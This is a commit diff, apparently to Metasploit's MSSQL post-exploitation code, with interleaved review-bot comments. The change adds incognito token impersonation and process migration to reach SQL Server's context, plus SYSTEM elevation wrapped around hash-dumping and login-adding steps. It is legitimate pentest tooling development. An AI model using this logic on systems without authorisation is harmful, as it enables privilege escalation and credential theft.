Use incognito token stealing rather than process migration if we have

the privileges required for successful impersonation.
bug/bundler_fix
Meatballs 2015-02-24 23:14:49 +00:00
parent 9c2219124c
commit 99f79e8533
3 changed files with 65 additions and 39 deletions


@ -100,10 +100,32 @@ module MSSQL
def impersonate_sql_user(service) def impersonate_sql_user(service)
pid = service[:pid] pid = service[:pid]
vprint_status("Current user: #{session.sys.config.getuid}") vprint_status("Current user: #{session.sys.config.getuid}")
current_privs = client.sys.config.getprivs
if current_privs.include?('SeImpersonatePrivilege') ||
current_privs.include?('SeTcbPrivilege') ||
current_privs.include?('SeAssignPrimaryTokenPrivilege')
username = nil
session.sys.process.each_process do |process|
if process['pid'] == pid
username = process['user']
break
end
end
session.core.use('incognito') unless session.incognito
vprint_status("Attemping to impersonate user: #{username}")
res = session.incognito.incognito_impersonate_token(username)
if res =~ /Successfully/i
print_good("Impersonated user: #{username}")
return true
else
return false
end
else
# Attempt to migrate to target sqlservr.exe process # Attempt to migrate to target sqlservr.exe process
# Migrating works, but I can't rev2self after its complete # Migrating works, but I can't rev2self after its complete
print_warning("Attempting to migrate to process #{pid}...") print_warning("No SeImpersonatePrivilege, attempting to migrate to process #{pid}...")
begin begin
session.core.migrate(pid) session.core.migrate(pid)
rescue Rex::RuntimeError => e rescue Rex::RuntimeError => e
@ -113,6 +135,7 @@ module MSSQL
vprint_status("Current user: #{session.sys.config.getuid}") vprint_status("Current user: #{session.sys.config.getuid}")
print_good("Successfully migrated to sqlservr.exe process #{pid}") print_good("Successfully migrated to sqlservr.exe process #{pid}")
end
true true
end end
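Review bot: `username` stays nil when `pid` is not found by `each_process` (the target process may have exited, or its owner may not be readable for a non-SYSTEM listing), and the new branch then hands nil to `incognito_impersonate_token` instead of failing cleanly; add after the loop `print_error("Unable to determine the user of pid #{pid}") if username.nil?` and `return false if username.nil?`. The branch also never falls back to migration when impersonation fails, which may be intended but deserves a sentence in the method's comment. Two smaller points: `vprint_status("Attemping to impersonate user: ...")` misspells "Attempting", and the privilege lookup goes through `client.sys.config.getprivs` while every other call in the method uses `session`. The migration branch continues into the second hunk, and the method's closing `end` is its last line.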


@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
system_status = get_system system_status = get_system
fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
begin
service = check_for_sqlserver(instance) service = check_for_sqlserver(instance)
fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
@ -61,10 +62,11 @@ class Metasploit3 < Msf::Post
get_sql_hash(instance_name) get_sql_hash(instance_name)
end end
end end
ensure
# return to original priv context # return to original priv context
session.sys.config.revert_to_self session.sys.config.revert_to_self
end end
end
def get_sql_version(instance_name) def get_sql_version(instance_name)
vprint_status("Attempting to get version...") vprint_status("Attempting to get version...")
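Review bot: The `# return to original priv context` comment on the new `ensure` overstates what `revert_to_self` does here: the library's impersonate_sql_user notes that rev2self does not work once it has had to migrate, so the original context only comes back on the incognito path; reword it to `# revert impersonation; has no effect if impersonate_sql_user fell back to migration`. Because the call sits in an `ensure`, an error raised by `revert_to_self` (for example on a session that has gone away) would replace the exception or fail_with reason that triggered the cleanup, so rescuing around that one call and printing the revert error would keep the original failure visible — hedged, as the hunk does not show whether the call can raise. The same ensure/revert shape is added in the third file's second hunk. The enclosing method starts before the first hunk.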


@ -6,7 +6,7 @@
require 'msf/core' require 'msf/core'
require 'rex' require 'rex'
require 'msf/core/post/windows/mssql' require 'msf/core/post/windows/mssql'
load '/home/ben/git/metasploit-framework/lib/msf/core/post/windows/mssql.rb'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Post::Windows::MSSQL include Msf::Post::Windows::MSSQL
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Post
# Get LocalSystem privileges # Get LocalSystem privileges
system_status = get_system system_status = get_system
fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
begin
service = check_for_sqlserver(instance) service = check_for_sqlserver(instance)
fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
@ -68,10 +68,11 @@ class Metasploit3 < Msf::Post
else else
add_login(service, instance_name) add_login(service, instance_name)
end end
ensure
# attempt to return to original priv context # attempt to return to original priv context
session.sys.config.revert_to_self session.sys.config.revert_to_self
end end
end
def add_login(service, instance_name) def add_login(service, instance_name)
begin begin